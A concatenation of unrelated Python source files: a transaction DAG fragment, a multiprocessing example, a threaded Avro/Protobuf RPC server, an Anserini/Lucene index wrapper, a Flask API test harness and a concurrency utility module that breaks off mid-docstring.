return self.dag.transaction_cache
def approved_by_delayed(self):
for t in self.approved_directly_by():
if t not in self.dag.transaction_cache:
self.dag.transaction_cache.add(t)
self.dag.transaction_cache.update(t.approved_by_delayed())
return self.dag.transaction_cache
def approved_directly_by(self):
return [p for p in self._approved_directly_by if p.is_visible()]
def __repr__(self):
return '<Transaction {}>'.format(self.num)
class Genesis(Transaction):
def __init__(self, dag):
self.dag = dag
self.time = 0
self.approved_transactions = []
self.approved_time = float('inf')
self._approved_directly_by = set()
self.num = 0
if hasattr(self.dag, 'graph'):
self.dag.graph.add_node(self.num, pos=(self.time, 0))
def __repr__(self):
return '<Genesis>'
|
processing_example.py | import multiprocessing
import time
def some_other_func(name, arg2):
print("[{0}] - start running process, arg={1}".format(name, arg2))
# time.sleep(1)
while True:
time.sleep(1)
print('[{0}] - .'.format(name))
if __name__ == '__main__':
p1_name = 'process1'
p1 = multiprocessing.Process(target=some_other_func, args=(p1_name, 'foo',))
print('[{0}] - is_alive={1}'.format(p1_name, p1.is_alive()))
print('[{0}] - start() call'.format(p1_name))
p1.start()
print('[{0}] - is_alive={1}'.format(p1_name, p1.is_alive()))
time.sleep(1)
# time.sleep(5)
print('[{0}] - exitcode={1}'.format(p1_name, p1.exitcode))
try:
p1.terminate()
print('[{0}] - terminated'.format(p1_name))
except:
print('force terminate')
print('[{0}] - exitcode={1}'.format(p1_name, p1.exitcode))
# print(p, p.is_alive())
# p.exitcode == -signal.SIGTERM
|
server.py | # -*-coding:utf-8-*-
import psutil
import time
from threading import Thread
import socketserver
from socketserver import TCPServer, ThreadingMixIn
from typing import Tuple
from enum import Enum, unique
from rpcserver.avro.proxy import AvroProxyFactory
from rpcserver.logger import logger
from rpcserver.protobuf import handler as protobuf_handler
from rpcserver.avro import handler as avro_handler
@unique
class Protocol(Enum):
Protobuf = 0
Avro = 1
def process_check(pid, server):
while 1:
try:
psutil.Process(pid)
time.sleep(1)
except psutil.NoSuchProcess:
break
server.shutdown()
class SocketServer:
def __init__(self, port, host='0.0.0.0', protocol=Protocol.Avro):
self.host = host
self.port = port
self.serviceMap = {}
self.protocols = []
self.avro_proxy_factory = None
self.proto = protocol
def register_service(self, service=None) -> None:
if service is None:
return
self.serviceMap[service.GetDescriptor().full_name] = service
def register_avro_protocols(self, protocols) -> None:
self.protocols = protocols
self.avro_proxy_factory = AvroProxyFactory()
for protocol in protocols:
self.avro_proxy_factory.load(protocol)
def run(self, pid) -> None:
logger.info('starting server on host: %s - port: %d' % (self.host, self.port))
handler = avro_handler.RequestHandler
if self.proto == Protocol.Protobuf:
handler = protobuf_handler.RequestHandler
server = None
try:
server = ThreadingTCPServer((self.host, self.port), handler, self)
if pid is not None:
Thread(target=process_check, args=(pid, server), daemon=True).start()
server.serve_forever()
except KeyboardInterrupt:
if server is not None:
server.shutdown()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
socketserver.allow_reuse_address = True
def __init__(self, server_address, handler, server):
socketserver.TCPServer.__init__(self, server_address, handler)
self.server = server
def finish_request(self, request: bytes,
client_address: Tuple[str, int]) -> None:
self.RequestHandlerClass(request, client_address, self, self.server)
|
multifield_anserini.py | import os
import math
import json
import tempfile
import itertools
import time
import re
import shutil
import threading
import contextlib
from multiprocessing.pool import ThreadPool
from functools import lru_cache
from pytools import memoize_method
import onir
from onir import indices
from onir.interfaces import trec
from onir.interfaces.java import J
logger = onir.log.easy()
J.register(jars=["bin/lucene-backward-codecs-8.0.0.jar", "bin/anserini-0.8.0-fatjar.jar"], defs=dict(
# [L]ucene
L_FSDirectory='org.apache.lucene.store.FSDirectory',
L_DirectoryReader='org.apache.lucene.index.DirectoryReader',
L_Term='org.apache.lucene.index.Term',
L_IndexSearcher='org.apache.lucene.search.IndexSearcher',
L_BM25Similarity='org.apache.lucene.search.similarities.BM25Similarity',
L_ClassicSimilarity='org.apache.lucene.search.similarities.ClassicSimilarity',
L_LMDirichletSimilarity='org.apache.lucene.search.similarities.LMDirichletSimilarity',
L_QueryParser='org.apache.lucene.queryparser.flexible.standard.StandardQueryParser',
L_QueryParserUtil='org.apache.lucene.queryparser.flexible.standard.QueryParserUtil',
L_StandardAnalyzer='org.apache.lucene.analysis.standard.StandardAnalyzer',
L_EnglishAnalyzer='org.apache.lucene.analysis.en.EnglishAnalyzer',
L_CharArraySet='org.apache.lucene.analysis.CharArraySet',
L_MultiFields='org.apache.lucene.index.MultiFields',
# [A]nserini
A_IndexCollection='io.anserini.index.IndexCollection',
A_IndexArgs='io.anserini.index.IndexArgs',
A_IndexUtils='io.anserini.index.IndexUtils',
A_LuceneDocumentGenerator='io.anserini.index.generator.LuceneDocumentGenerator',
A_SearchCollection='io.anserini.search.SearchCollection',
A_SearchArgs='io.anserini.search.SearchArgs',
A_DefaultEnglishAnalyzer='io.anserini.analysis.DefaultEnglishAnalyzer',
A_AnalyzerUtils='io.anserini.analysis.AnalyzerUtils',
# [M]isc
M_CmdLineParser='org.kohsuke.args4j.CmdLineParser',
))
def _surpress_log(java_class, levels=('DEBUG', 'INFO')):
re_levels = r'|'.join([re.escape(l) for l in levels])
re_java_class = re.escape(java_class)
regex = rf'({re_levels}) {re_java_class}'
def wrapped(log_line):
return re.search(regex, log_line) is None
return wrapped
def pbar_bq_listener(pbar):
def wrapped(log_line):
match = re.search(r'INFO io.anserini.search.SearchCollection \[pool-.*-thread-.*\] ([0-9]+) queries processed', log_line)
if match:
count = int(match.group(1))
pbar.update(count - pbar.n)
return False
return wrapped
class MultifieldAnseriniIndex(indices.BaseIndex):
"""
Interface to an Anserini index.
"""
def __init__(self, path, keep_stops=False, stemmer='porter', primary_field='text', lang='en'):
self._base_path = path
os.makedirs(path, exist_ok=True)
self._path = f'{path}-{primary_field}'
if not os.path.exists(self._path):
os.symlink(self._base_path.split('/')[-1], self._path, target_is_directory=True)
self._primary_field = primary_field
self._settings_path = os.path.join(path, 'settings.json')
if os.path.exists(self._settings_path):
self._load_settings()
assert self._settings['keep_stops'] == keep_stops
assert self._settings['stemmer'] == stemmer
assert self._settings['lang'] == lang
else:
self._settings = {
'keep_stops': keep_stops,
'stemmer': stemmer,
'lang': lang,
'built': False
}
self._dump_settings()
def _dump_settings(self):
with open(self._settings_path, 'wt') as f:
json.dump(self._settings, f)
def _load_settings(self):
with open(self._settings_path, 'rt') as f:
self._settings = json.load(f)
if 'lang' not in self._settings:
self._settings['lang'] = 'en'
def built(self):
self._load_settings()
return self._settings['built']
def built(self):
self._load_settings()
return self._settings['built']
def num_docs(self):
return self._reader().numDocs()
def docids(self):
index_utils = self._get_index_utils()
for i in range(self.num_docs()):
yield index_utils.convertLuceneDocidToDocid(i)
def get_raw(self, did):
return self._get_index_utils().getRawDocument(did)
def path(self):
return self._path
@memoize_method
def _reader(self):
return J.L_DirectoryReader.open(J.L_FSDirectory.open(J.File(self._path).toPath()))
@memoize_method
def _searcher(self):
return J.L_IndexSearcher(self._reader().getContext())
@memoize_method
def term2idf(self, term):
term = J.A_AnalyzerUtils.tokenize(self._get_stemmed_analyzer(), term).toArray()
if term:
df = self._reader().docFreq(J.L_Term(self._primary_field, term[0]))
doc_count = self.collection_stats().docCount()
return math.log(1 + (doc_count - df + 0.5) / (df + 0.5))
return 0. # stop word; very common
@memoize_method
def term2idf_unstemmed(self, term):
term = J.A_AnalyzerUtils.tokenize(self._get_analyzer(), term).toArray()
if len(term) == 1:
df = self._reader().docFreq(J.L_Term(self._primary_field, term[0]))
doc_count = self.collection_stats().docCount()
return math.log(1 + (doc_count - df + 0.5) / (df + 0.5))
return 0. # stop word; very common
def doc_freq(self, term):
return self._reader().docFreq(J.L_Term(self._primary_field, term))
@memoize_method
def collection_stats(self):
return self._searcher().collectionStatistics(self._primary_field)
def document_vector(self, did):
result = {}
ldid = self._get_index_utils().convertDocidToLuceneDocid(did)
vec = self._reader().getTermVector(ldid, self._primary_field)
it = vec.iterator()
while it.next():
result[it.term().utf8ToString()] = it.totalTermFreq()
return result
def avg_dl(self):
cs = self.collection_stats()
return cs.sumTotalTermFreq() / cs.docCount()
@memoize_method
def _get_index_utils(self):
return J.A_IndexUtils(self._path)
@lru_cache(maxsize=16)
def get_doc(self, did):
ldid = self._get_index_utils().convertDocidToLuceneDocid(did)
if ldid == -1:
return ["a"] # hack -- missing doc
return self._get_index_utils().getTransformedDocument(did) or ["a"]
@memoize_method
def _get_analyzer(self):
return J.L_StandardAnalyzer(J.L_CharArraySet(0, False))
@memoize_method
def _get_stemmed_analyzer(self):
return J.A_EnglishStemmingAnalyzer(self._settings['stemmer'], J.L_CharArraySet(0, False))
def tokenize(self, text):
result = J.A_AnalyzerUtils.tokenize(self._get_analyzer(), text).toArray()
# mostly good, just gonna split off contractions
result = list(itertools.chain(*(x.split("'") for x in result)))
return result
def iter_terms(self):
it_leaves = self._reader().leaves().iterator()
while it_leaves.hasNext():
it_terms = it_leaves.next().reader().terms(self._primary_field).iterator()
while it_terms.next():
yield {
'term': it_terms.term().utf8ToString(),
'df': it_terms.docFreq(),
'cf': it_terms.totalTermFreq(),
}
@memoize_method
def _model(self, model):
if model == 'randomqrels':
return self._model('bm25_k1-0.6_b-0.5')
if model.startswith('bm25'):
k1, b = 0.9, 0.4
Model = J.L_BM25Similarity
for arg in model.split('_')[1:]:
if '-' in arg:
k, v = arg.split('-')
else:
k, v = arg, None
if k == 'k1':
k1 = float(v)
elif k == 'b':
b = float(v)
elif k == 'noidf':
Model = J.A_BM25SimilarityNoIdf
else:
raise ValueError(f'unknown bm25 parameter {k}={v}')
return Model(k1, b)
elif model == 'vsm':
return J.L_ClassicSimilarity()
elif model == 'ql':
mu = 1000.
for k, v in [arg.split('-') for arg in model.split('_')[1:]]:
if k == 'mu':
mu = float(v)
else:
raise ValueError(f'unknown ql parameter {k}={v}')
return J.L_LMDirichletSimilarity(mu)
raise ValueError(f'unknown model {model}')
@memoize_method
def get_query_doc_scores(self, query, did, model, skip_invividual=False):
sim = self._model(model)
self._searcher().setSimilarity(sim)
ldid = self._get_index_utils().convertDocidToLuceneDocid(did)
if ldid == -1:
return -999. * len(query), [-999.] * len(query)
analyzer = self._get_stemmed_analyzer()
query = list(itertools.chain(*[J.A_AnalyzerUtils.tokenize(analyzer, t).toArray() for t in query]))
if not skip_invividual:
result = []
for q in query:
q = _anserini_escape(q, J)
lquery = J.L_QueryParser().parse(q, self._primary_field)
explain = self._searcher().explain(lquery, ldid)
result.append(explain.getValue().doubleValue())
return sum(result), result
lquery = J.L_QueryParser().parse(_anserini_escape(' '.join(query), J), self._primary_field)
explain = self._searcher().explain(lquery, ldid)
return explain.getValue()
def get_query_doc_scores_batch(self, query, dids, model):
sim = self._model(model)
self._searcher().setSimilarity(sim)
ldids = {self._get_index_utils().convertDocidToLuceneDocid(did): did for did in dids}
analyzer = self._get_stemmed_analyzer()
query = J.A_AnalyzerUtils.tokenize(analyzer, query).toArray()
query = ' '.join(_anserini_escape(q, J) for q in query)
docs = ' '.join(f'{J.A_LuceneDocumentGenerator.FIELD_ID}:{did}' for did in dids)
lquery = J.L_QueryParser().parse(f'({query}) AND ({docs})', self._primary_field)
result = {}
search_results = self._searcher().search(lquery, len(dids))
for top_doc in search_results.scoreDocs:
result[ldids[top_doc.doc]] = top_doc.score
del search_results
return result
def build(self, doc_iter, replace=False, optimize=True, store_term_weights=False):
with logger.duration(f'building {self._base_path}'):
thread_count = onir.util.safe_thread_count()
with tempfile.TemporaryDirectory() as d:
if self._settings['built']:
if replace:
logger.warn(f'removing index: {self._base_path}')
shutil.rmtree(self._base_path)
else:
logger.warn(f'adding to existing index: {self._base_path}')
fifos = []
for t in range(thread_count):
fifo = os.path.join(d, f'{t}.json')
os.mkfifo(fifo)
fifos.append(fifo)
index_args = J.A_IndexArgs()
index_args.collectionClass = 'JsonCollection'
index_args.generatorClass = 'LuceneDocumentGenerator'
index_args.threads = thread_count
index_args.input = d
index_args.index = self._base_path
index_args.storePositions = True
index_args.storeDocvectors = True
index_args.storeTermWeights = store_term_weights
index_args.keepStopwords = self._settings['keep_stops']
index_args.stemmer = self._settings['stemmer']
index_args.optimize = optimize
indexer = J.A_IndexCollection(index_args)
thread = threading.Thread(target=indexer.run)
thread.start()
time.sleep(1) # give it some time to start up, otherwise fails due to race condition
for i, doc in enumerate(doc_iter):
f = fifos[hash(i) % thread_count]
if isinstance(f, str):
f = open(f, 'wt')
fifos[hash(i) % thread_count] = f
data = {'id': doc.did, 'contents': 'a'}
data.update(doc.data)
json.dump(data, f)
f.write('\n')
for f in fifos:
if not isinstance(f, str):
f.close()
else:
with open(f, 'wt'):
pass # open and close to indicate file is done
logger.debug('waiting to join')
thread.join()
self._settings['built'] = True
self._dump_settings()
def query(self, query, model, topk, destf=None, quiet=False):
return self.batch_query([('0', query)], model, topk, destf=destf, quiet=quiet)['0']
def batch_query(self, queries, model, topk, destf=None, quiet=False):
THREADS = onir.util.safe_thread_count()
query_file_splits = 1000
if hasattr(queries, '__len__'):
if len(queries) < THREADS:
THREADS = len(queries)
query_file_splits = 1
elif len(queries) < THREADS * 10:
query_file_splits = ((len(queries)+1) // THREADS)
elif len(queries) < THREADS * 100:
query_file_splits = ((len(queries)+1) // (THREADS * 10))
else:
query_file_splits = ((len(queries)+1) // (THREADS * 100))
with tempfile.TemporaryDirectory() as topic_d, tempfile.TemporaryDirectory() as run_d:
run_f = os.path.join(run_d, 'run')
topic_files = []
file_topic_counts = []
current_file = None
total_topics = 0
for i, (qid, text) in enumerate(queries):
topic_file = '{}/{}.queries'.format(topic_d, i // query_file_splits)
if current_file is None or current_file.name != topic_file:
if current_file is not None:
topic_files.append(current_file.name)
current_file.close()
current_file = open(topic_file, 'wt')
file_topic_counts.append(0)
current_file.write(f'{qid}\t{text}\n')
file_topic_counts[-1] += 1
total_topics += 1
if current_file is not None:
topic_files.append(current_file.name)
current_file.close()
J.initialize()
with ThreadPool(THREADS) as pool, \
logger.pbar_raw(desc=f'batch_query ({model})', total=total_topics) as pbar:
def fn(inputs):
file, count = inputs
args = J.A_SearchArgs()
parser = J.M_CmdLineParser(args)
arg_args = [
'-index', self._path,
'-topics', file,
'-output', file + '.run',
'-topicreader', 'TsvString',
'-hits', str(topk),
'-stemmer', self._settings['stemmer'],
'-indexfield', self._primary_field,
]
arg_args += self._model2args(model)
parser.parseArgument(*arg_args)
searcher = J.A_SearchCollection(args)
searcher.runTopics()
searcher.close()
return file + '.run', count
if destf:
result = open(destf + '.tmp', 'wb')
else:
result = {}
for resultf, count in pool.imap_unordered(fn, zip(topic_files, file_topic_counts)):
if destf:
with open(resultf, 'rb') as f:
for line in f:
result.write(line)
else:
run = trec.read_run_dict(resultf)
result.update(run)
pbar.update(count)
if destf:
result.close()
shutil.move(destf + '.tmp', destf)
else:
return result
def _model2args(self, model):
arg_args = []
if model.startswith('bm25'):
arg_args.append('-bm25')
model_args = [arg.split('-', 1) for arg in model.split('_')[1:]]
for arg in model_args:
if len(arg) == 1:
k, v = arg[0], None
elif len(arg) == 2:
k, v = arg
if k == 'k1':
arg_args.append('-bm25.k1')
arg_args.append(v)
elif k == 'b':
arg_args.append('-bm25.b')
arg_args.append(v)
elif k == 'rm3':
arg_args.append('-rm3')
elif k == 'rm3.fbTerms':
arg_args.append('-rm3.fbTerms')
arg_args.append(v)
elif k == 'rm3.fbDocs':
arg_args.append('-rm3.fbDocs')
arg_args.append(v)
elif k == 'sdm':
arg_args.append('-sdm')
elif k == 'tw':
arg_args.append('-sdm.tw')
arg_args.append(v)
elif k == 'ow':
arg_args.append('-sdm.ow')
arg_args.append(v)
elif k == 'uw':
arg_args.append('-sdm.uw')
arg_args.append(v)
else:
raise ValueError(f'unknown bm25 parameter {arg}')
elif model.startswith('ql'):
arg_args.append('-qld')
model_args = [arg.split('-', 1) for arg in model.split('_')[1:]]
for arg in model_args:
if len(arg) == 1:
k, v = arg[0], None
elif len(arg) == 2:
k, v = arg
if k == 'mu':
arg_args.append('-mu')
arg_args.append(v)
else:
raise ValueError(f'unknown ql parameter {arg}')
elif model.startswith('sdm'):
arg_args.append('-sdm')
arg_args.append('-qld')
model_args = [arg.split('-', 1) for arg in model.split('_')[1:]]
for arg in model_args:
if len(arg) == 1:
k, v = arg[0], None
elif len(arg) == 2:
k, v = arg
if k == 'mu':
arg_args.append('-mu')
arg_args.append(v)
elif k == 'tw':
arg_args.append('-sdm.tw')
arg_args.append(v)
elif k == 'ow':
arg_args.append('-sdm.ow')
arg_args.append(v)
elif k == 'uw':
arg_args.append('-sdm.uw')
arg_args.append(v)
else:
raise ValueError(f'unknown sdm parameter {arg}')
else:
raise ValueError(f'unknown model {model}')
return arg_args
|
testing.py | # Copyright 2021 Curtin University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Author: James Diprose
import contextlib
import threading
from observatory.api.server.api import create_app
from observatory.api.server.orm import create_session, set_session
from sqlalchemy.pool import StaticPool
from werkzeug.serving import make_server
class ObservatoryApiEnvironment:
def __init__(self, host: str = "localhost", port: int = 5000, seed_db: bool = False):
"""Create an ObservatoryApiEnvironment instance.
:param host: the host name.
:param port: the port.
:param seed_db: whether to seed the database or not.
"""
self.host = host
self.port = port
self.seed_db = seed_db
self.db_uri = "sqlite://"
self.session = None
self.server = None
self.server_thread = None
@contextlib.contextmanager
def create(self):
"""Make and destroy an Observatory API isolated environment, which involves:
* Creating an in memory SQLite database for the API backend to connect to
* Start the Connexion / Flask app
:yield: None.
"""
try:
# Connect to in memory SQLite database with SQLAlchemy
self.session = create_session(
uri=self.db_uri, connect_args={"check_same_thread": False}, poolclass=StaticPool
)
set_session(self.session)
# Create the Connexion App and start the server
app = create_app()
self.server = make_server(self.host, self.port, app)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.start()
yield
finally:
# Stop server and wait for server thread to join
self.server.shutdown()
self.server_thread.join()
|
concurrency.py | # The MIT License (MIT)
#
# Copyright (c) 2018 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This module provides a simple interface to creating and managing concurrent
tasks. Note that the module does not primarily focus on performance
multithreading, but to enable writing multitask applications with ease.
Compatible with Python 2 and 3.
# Example
```python
from nr.concurrency import Job, as_completed
from requests import get
urls = ['https://google.com', 'https://github.com', 'https://readthedocs.org']
for job in as_completed(Job((lambda: get(x)), start=True) for x in urls):
print(job.result)
```
# Members
main_thread (threading._MainThread): The main-thread object.
"""
from threading import current_thread
import collections
import functools
import threading
import time
import traceback
import sys
try:
import queue
except ImportError:
import Queue as queue
main_thread = next(t for t in threading.enumerate()
if isinstance(t, threading._MainThread))
# Synchronizable API
# ============================================================================
class Synchronizable(object):
"""
Base class that implements the #Synchronizable interface. Classes that
inherit from this class can automatically be used with the #synchronized(),
#wait(), #notify() and #notify_all() functions.
# Attributes
synchronizable_lock_type[static]: A type or function that returns lock
object. Defaults to #threading.RLock.
synchronizable_condition_type[static]: A type or function that accepts
an instance of `synchronizable_lock_type` as its first argument and
returns a new condition variable.
synchronizable_lock: An instance of type `synchronizable_lock_type`.
synchronizable_condition: An instance of type `synchronizable_condition_type`.
The `synchronizable_lock` is passed as an argument to the constructor when
the condition variable is created.
"""
synchronizable_lock_type = staticmethod(threading.RLock)
synchronizable_condition_type = staticmethod(threading.Condition)
def __new__(cls, *args, **kwargs):
instance = super(Synchronizable, cls).__new__(cls)
instance.synchronizable_lock = cls.synchronizable_lock_type()
instance.synchronizable_condition = cls.synchronizable_condition_type(instance.synchronizable_lock)
return instance
def synchronized(obj):
"""
This function has two purposes:
1. Decorate a function that automatically synchronizes access to the object
passed as the first argument (usually `self`, for member methods)
2. Synchronize access to the object, used in a `with`-statement.
Note that you can use #wait(), #notify() and #notify_all() only on
synchronized objects.
# Example
```python
class Box(Synchronizable):
def __init__(self):
self.value = None
@synchronized
def get(self):
return self.value
@synchronized
def set(self, value):
self.value = value
box = Box()
box.set('foobar')
with synchronized(box):
box.value = 'taz\'dingo'
print(box.get())
```
# Arguments
obj (Synchronizable, function): The object to synchronize access to, or a
function to decorate.
# Returns
1. The decorated function.
2. The value of `obj.synchronizable_condition`, which should implement the
context-manager interface (to be used in a `with`-statement).
"""
if hasattr(obj, 'synchronizable_condition'):
return obj.synchronizable_condition
elif callable(obj):
@functools.wraps(obj)
def wrapper(self, *args, **kwargs):
with self.synchronizable_condition:
return obj(self, *args, **kwargs)
return wrapper
else:
raise TypeError('expected Synchronizable instance or callable to decorate')
def wait(obj, timeout=None):
"""
Wait until *obj* gets notified with #notify() or #notify_all(). If a timeout
is specified, the function can return without the object being notified if
the time runs out.
Note that you can only use this function on #synchronized() objects.
# Arguments
obj (Synchronizable): An object that can be synchronized.
timeout (number, None): The number of seconds to wait for the object to get
notified before returning. If not value or the value #None is specified,
the function will wait indefinetily.
"""
if timeout is None:
return obj.synchronizable_condition.wait()
else:
return obj.synchronizable_condition.wait(timeout)
def wait_for_condition(obj, cond, timeout=None):
"""
This is an extended version of #wait() that applies the function *cond* to
check for a condition to break free from waiting on *obj*. Note that *obj*
must be notified when its state changes in order to check the condition.
Note that access to *obj* is synchronized when *cond* is called.
# Arguments
obj (Synchronizable): The object to synchronize and wait for *cond*.
cond (function): A function that accepts *obj* as an argument. Must return
#True if the condition is met.
timeout (number, None): The maximum number of seconds to wait.
# Returns
bool: #True if the condition was met, #False if not and a timeout ocurred.
"""
with synchronized(obj):
if timeout is None:
while not cond(obj):
wait(obj)
else:
t_start = time.time()
while not cond(obj):
t_delta = time.time() - t_start
if t_delta >= timeout:
return False
wait(obj, timeout - t_delta)
return True
def notify(obj):
"""
Notify *obj* so that a single thread that is waiting for the object with
#wait() can continue. Note that you can only use this function on
#synchronized() objects.
# Arguments
obj (Synchronizable): The object to notify.
"""
return obj.synchronizable_condition.notify()
def notify_all(obj):
"""
Like #notify(), but allow all waiting threads to continue.
"""
return obj.synchronizable_condition.notify_all()
# Job API
# ============================================================================
class Timeout(Exception):
" Raised when a timeout occurred. "
class Job(Synchronizable):
"""
This class represents a task (Python function) and its result. The result is
stored in the #Job object and can be retrieved at any time, given that the
job has finished successfully. Exceptions that ocurr inside the Python
function that is invoked by the job can propagated to the caller that obtains
the result of the job.
# Job States
A job can only be in one state at a time. Depending on the state, fetching
the result of the job will either raise an #InvalidState exception, a
#Cancelled exception, any other exception that ocurred in the Python function
that was called by the job, or actually return the result.
Possible states are:
- `Job.PENDING`: The job is waiting to be started.
- `Job.RUNNING`: The job is currently running.
- `Job.ERROR`: The execution of the job resulted in an exception.
- `Job.SUCCESS`: The job finished successfully and the result can be obtained.
- `Job.CANCELLED`: The job was cancelled and finished. Note that this state
entered after the #Job.cancelled flag is set.
# Events
For every job, one or more callbacks can be registered which is invoked every
time the job transitions into a new state. See #Job.add_listener()
# Parameters
task (callable): A callable accepting #Job object as argument that actually
performs the task and returns the result. If you want to pass a callable
that takes no arguments, pass it via the `target` parameter.
target (callable): Just as the `task` parameter, but this time the function
does not accept any arguments. Note that the two parameters can not be
specified at the same time. Doing so will result in a #TypeError.
name (any):
start (bool): #True if the job should be started in a separate thread
immediately. Defaults to #False.
data (any):
print_exc (bool):
# Attributes
name (any): An identifier for the Job. Defaults to #None. This member is
useful for debugging concurrent applications by giving Jobs a unique name.
data (any): This member can be filled with an arbitrary Python object.
Useful to store context information that is needed when the Job finished.
Note that access to this member, if not already garuanteed to be exclusive,
must be #synchronized().
print_exc (bool): Whether to print the traceback of exceptions ocurring in
the #Job.run() or #Job.target or not. Defaults to #True.
dispose_inputs (bool): Should be used for jobs that have memory intensive
input data, to eventually allow the input data to be deallocated due to the
dropped reference count. Settings this to True will cause all input data to
be disposed after the Job finished executing (the worker function, args,
kwargs, clearing all listeners and userdata).
"""
PENDING = 'pending'
RUNNING = 'running'
ERROR = 'error'
SUCCESS = 'success'
CANCELLED = 'cancelled'
_Listener = collections.namedtuple('_Listener', 'callback once')
ExceptionInfo = collections.namedtuple('ExceptionInfo', 'type value tb')
Timeout = Timeout
class Cancelled(Exception):
" Raised when the Job was cancelled in #Job.wait() or #Job.result. "
class InvalidState(Exception):
"""
Raised when the Job is in a state that is not supported by the requested
operation (eg. reading the result while the job is still running).
"""
def __init__(self, target=None, task=None, name=None, start=False, data=None,
print_exc=True, args=None, kwargs=None, dispose_inputs=False):
super(Job, self).__init__()
if target is not None:
if task is not None:
raise TypeError('either task or target parameter must be specified, not both')
task = lambda job, *args, **kwargs: target(*args, **kwargs)
self.__target = task
self.__thread = None
self.__args = () if args is None else args
self.__kwargs = {} if kwargs is None else {}
self.__state = Job.PENDING
self.__cancelled = False
self.__result = None
self.__exception = None
self.__listeners = {None: [], Job.SUCCESS: [], Job.ERROR: [], Job.CANCELLED: []}
self.__event_set = set()
self.__dispose_inputs = dispose_inputs
self.name = name
self.data = data
self.print_exc = print_exc
if start: self.start()
def __repr__(self):
if self.name:
name = self.name
elif hasattr(self.__target, '__name__'):
name = self.__target.__name__
elif hasattr(self, 'name'):
name = self.name
if callable(name):
name = name()
else:
name = None
with synchronized(self):
state = self.__state
cancelled = self.__cancelled
result = '<cancelled Job' if (cancelled and state != Job.CANCELLED) else '<Job'
result += ' {0!r} at 0x{1:x}, state: {2}>'.format(name, id(self), state)
return result
@property
@synchronized
def state(self):
" The job's state, one of #PENDING, #RUNNING, #ERROR, #SUCCESS or #CANCELLED. "
return self.__state
@property
@synchronized
def result(self):
"""
The result of the jobs execution. Accessing this property while the job is
pending or running will raise #InvalidState. If an exception occured during
the jobs execution, it will be raised.
# Raises
InvalidState: If the job is not in state #FINISHED.
Cancelled: If the job was cancelled.
any: If an exception ocurred during the job's execution.
"""
if self.__cancelled:
raise Job.Cancelled
elif self.__state in (Job.PENDING, Job.RUNNING):
raise Job.InvalidState('job is {0}'.format(self.__state))
elif self.__state == Job.ERROR:
reraise(*self.__exception)
elif self.__state == Job.SUCCESS:
return self.__result
else:
raise RuntimeError('invalid job state {0!r}'.format(self.__state))
@property
@synchronized
def exception(self):
"""
The exception that occured while the job executed. The value is #None if
no exception occurred.
# Raises
InvalidState: If the job is #PENDING or #RUNNING.
"""
if self.__state in (Job.PENDING, Job.RUNNING):
raise self.InvalidState('job is {0}'.format(self.__state))
elif self.__state == Job.ERROR:
assert self.__exception is not None
return self.__exception
elif self.__state in (Job.RUNNING, Job.SUCCESS, Job.CANCELLED):
assert self.__exception is None
return None
else:
raise RuntimeError('invalid job state {0!r}'.format(self.__state))
@property
@synchronized
def pending(self):
" True if the job is #PENDING. "
return self.__state == Job.PENDING
@property
@synchronized
def running(self):
" True if the job is #RUNNING. "
return self.__state == Job.RUNNING
@property
@synchronized
def finished(self):
"""
True if the job run and finished. There is no difference if the job
finished successfully or errored.
"""
return self.__state in (Job.ERROR, Job.SUCCESS, Job.CANCELLED)
@property
@synchronized
def cancelled(self):
"""
This property indicates if the job was cancelled. Note that with this flag
set, the job can still be in any state (eg. a pending job can also be
cancelled, starting it will simply not run the job).
"""
return self.__cancelled
@synchronized
def get(self, default=None):
"""
Get the result of the Job, or return *default* if the job is not finished
or errored. This function will never explicitly raise an exception. Note
that the *default* value is also returned if the job was cancelled.
# Arguments
default (any): The value to return when the result can not be obtained.
"""
if not self.__cancelled and self.__state == Job.SUCCESS:
return self.__result
else:
return default
def cancel(self):
"""
Cancels the job. Functions should check the #Job.cancelled flag from time
to time to be able to abort pre-emptively if the job was cancelled instead
of running forever.
"""
with synchronized(self):
cancelled = self.__cancelled
if not cancelled:
self.__cancelled = True
notify_all(self)
if not cancelled:
self._trigger_event(Job.CANCELLED)
@synchronized
def _trigger_event(self, event):
"""
Private. Triggers and event and removes all one-off listeners for that event.
"""
if event is None or event not in self.__listeners:
raise ValueError('invalid event type: {0!r}'.format(event))
# Check the event has not already been triggered, then mark
# the event as triggered.
if event in self.__event_set:
raise RuntimeError('event already triggered: {0!r}'.format(event))
self.__event_set.add(event)
listeners = self.__listeners[event] + self.__listeners[None]
# Remove one-off listeners.
self.__listeners[event][:] = (l for l in self.__listeners[event] if not l.once)
self.__listeners[None][:] = (l for l in self.__listeners[None] if not l.once)
for listener in listeners:
# XXX: What to do on exceptions? Catch and make sure all listeners
# run through? What to do with the exception(s) then?
listener.callback(self, event)
def add_listener(self, event, callback, once=False):
"""
Register a *callback* for the specified *event*. The function will be
called with the #Job as its first argument. If *once* is #True, the
listener will be removed after it has been invoked once or when the
job is re-started.
Note that if the event already ocurred, *callback* will be called
immediately!
# Arguments
event (str, list of str): The name or multiple names of an event, or None
to register the callback to be called for any event.
callback (callable): A function.
